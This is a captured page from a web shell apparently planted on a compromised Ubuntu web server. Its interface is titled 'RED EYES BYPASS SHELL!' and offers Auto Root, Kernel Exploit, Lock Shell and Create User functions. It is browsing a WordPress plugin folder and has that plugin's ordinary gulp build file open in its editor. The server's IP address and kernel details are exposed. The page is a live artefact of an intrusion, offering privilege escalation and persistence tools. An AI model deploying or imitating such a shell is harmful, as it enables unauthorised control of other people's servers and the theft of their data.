Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
bigdata /
wp-content /
plugins /
complianz-gdpr /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
DNSMPD
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
cookie
[ DIR ]
drwxr-xr-x
cookiebanner
[ DIR ]
drwxr-xr-x
cron
[ DIR ]
drwxr-xr-x
documents
[ DIR ]
drwxr-xr-x
gutenberg
[ DIR ]
drwxr-xr-x
integrations
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
mailer
[ DIR ]
drwxr-xr-x
onboarding
[ DIR ]
drwxr-xr-x
placeholders
[ DIR ]
drwxr-xr-x
progress
[ DIR ]
drwxr-xr-x
proof-of-consent
[ DIR ]
drwxr-xr-x
rest-api
[ DIR ]
drwxr-xr-x
settings
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
upgrade
[ DIR ]
drwxr-xr-x
websitescan
[ DIR ]
drwxr-xr-x
LICENSE.txt
17.98
KB
-rwxr-xr-x
README.md
2.17
KB
-rwxr-xr-x
class-admin.php
17.3
KB
-rwxr-xr-x
class-company.php
3.51
KB
-rwxr-xr-x
class-cookie-blocker.php
33.24
KB
-rwxr-xr-x
class-document.php
90.92
KB
-rwxr-xr-x
class-export.php
1.49
KB
-rwxr-xr-x
class-field.php
117.26
KB
-rwxr-xr-x
class-installer.php
3.97
KB
-rwxr-xr-x
class-review.php
5.56
KB
-rwxr-xr-x
class-wizard.php
37.1
KB
-rwxr-xr-x
complianz-gpdr.php
14.41
KB
-rwxr-xr-x
composer.json
712
B
-rwxr-xr-x
functions-legacy.php
175
B
-rwxr-xr-x
functions.php
78.58
KB
-rwxr-xr-x
gulpfile.js
4.36
KB
-rwxr-xr-x
index.php
28
B
-rwxr-xr-x
loco.xml
374
B
-rwxr-xr-x
readme.txt
29.4
KB
-rwxr-xr-x
security.md
686
B
-rwxr-xr-x
system-status.php
4.75
KB
-rwxr-xr-x
uninstall.php
6.76
KB
-rwxr-xr-x
upgrade.php
34.73
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : gulpfile.js
const gulp = require('gulp'); const rtlcss = require('gulp-rtlcss'); const concat = require('gulp-concat'); const cssbeautify = require('gulp-cssbeautify'); const cssuglify = require('gulp-uglifycss'); const jsuglify = require('gulp-uglify'); const sass = require('gulp-sass')(require('sass')); const spawn = require('child_process').spawn; /** * Watches for changes in specific JavaScript and SCSS files and triggers the corresponding build tasks. * Also starts an npm process in the 'settings' directory. * */ function defaultTask(cb) { gulp.watch('./assets/css/document.scss', { ignoreInitial: false }, buildCssDocument); // Watch for changes in 'document-grid.scss' and run 'buildCssDocumentGrid' task gulp.watch('./assets/css/document-grid.scss', { ignoreInitial: false }, buildCssDocumentGrid); // Watch for changes in 'admin.scss' and run 'buildCssAdmin' task gulp.watch('./assets/css/admin.scss', { ignoreInitial: false }, buildCssAdmin); // Watch for changes in 'cookieblocker.scss' and run 'buildCssCookieblocker' task gulp.watch('./assets/css/cookieblocker.scss', { ignoreInitial: false }, buildCssCookieblocker); // Watch for changes in JavaScript files in the 'cookiebanner/js' directory and run 'buildJsCookiebanner' task gulp.watch('./cookiebanner/js/complianz.js', { ignoreInitial: false }, buildJsCookiebanner); // Watch for changes in 'document.scss' and run 'buildCssDocument' task // Start an npm process in the 'settings' directory // spawn('npm', ['start'], { cwd: 'settings', stdio: 'inherit' }); // Signal completion cb(); } exports.default = defaultTask /** * Builds the Cookiebanner JavaScript files by concatenating and minifying them. * */ function buildJsCookiebanner() { return gulp.src('cookiebanner/js/complianz.js') .pipe(concat('complianz.min.js')) .pipe(jsuglify()) .pipe(gulp.dest('./cookiebanner/js')); // Final output for minified version } exports['build:js:cookiebanner'] = buildJsCookiebanner; /** * Builds all JavaScript files by running the specified tasks in series. * */ function buildJsAll(cb) { return gulp.series( buildJsCookiebanner )(cb); } exports['build:js:all'] = buildJsAll; /** * Builds all CSS files by running the specified tasks in series. * */ function buildCssAll(cb) { return gulp.series( buildCssDocument, buildCssDocumentGrid, buildCssAdmin, buildCssCookieblocker, )(cb); } exports['build:css:all'] = buildCssAll; /** * Builds the Document CSS by compiling SCSS to CSS, beautifying, minifying. * */ function buildCssDocument() { return gulp.src('./assets/css/document.scss') .pipe(sass(({outputStyle: 'expanded'})).on('error', sass.logError)) .pipe(cssbeautify()) // Beautify the CSS .pipe(gulp.dest('./assets/css')) .pipe(cssuglify()) // Minify the CSS .pipe(concat('document.min.css')) .pipe(gulp.dest('./assets/css')); } exports['build:css:document'] = buildCssDocument; /** * Builds the DocumentGrid CSS by compiling SCSS to CSS, beautifying, minifying. * */ function buildCssDocumentGrid() { return gulp.src('./assets/css/document-grid.scss') .pipe(sass(({outputStyle: 'expanded'})).on('error', sass.logError)) .pipe(cssbeautify()) // Beautify the CSS .pipe(gulp.dest('./assets/css')) .pipe(cssuglify()) // Minify the CSS .pipe(concat('document-grid.min.css')) .pipe(gulp.dest('./assets/css')); } exports['build:css:document-grid'] = buildCssDocumentGrid; /** * Builds the Admin CSS by compiling SCSS to CSS, beautifying, minifying, and generating RTL CSS. * */ function buildCssAdmin() { return gulp.src('./assets/css/admin.scss') .pipe(sass(({outputStyle: 'expanded'})).on('error', sass.logError)) .pipe(cssbeautify()) // Beautify the CSS .pipe(gulp.dest('./assets/css')) .pipe(cssuglify()) // Minify the CSS .pipe(concat('admin.min.css')) .pipe(gulp.dest('./assets/css')) .pipe(rtlcss()) .pipe(gulp.dest('./assets/css/rtl')); } exports['build:css:admin'] = buildCssAdmin; /** * Builds the Cookieblocker CSS by compiling SCSS to CSS, beautifying, minifying. * */ function buildCssCookieblocker() { return gulp.src('./assets/css/cookieblocker.scss') .pipe(sass(({outputStyle: 'expanded'})).on('error', sass.logError)) .pipe(cssbeautify()) // Beautify the CSS .pipe(gulp.dest('./assets/css')) .pipe(cssuglify()) // Minify the CSS .pipe(concat('cookieblocker.min.css')) .pipe(gulp.dest('./assets/css')); } exports['build:css:cookieblocker'] = buildCssCookieblocker;
Close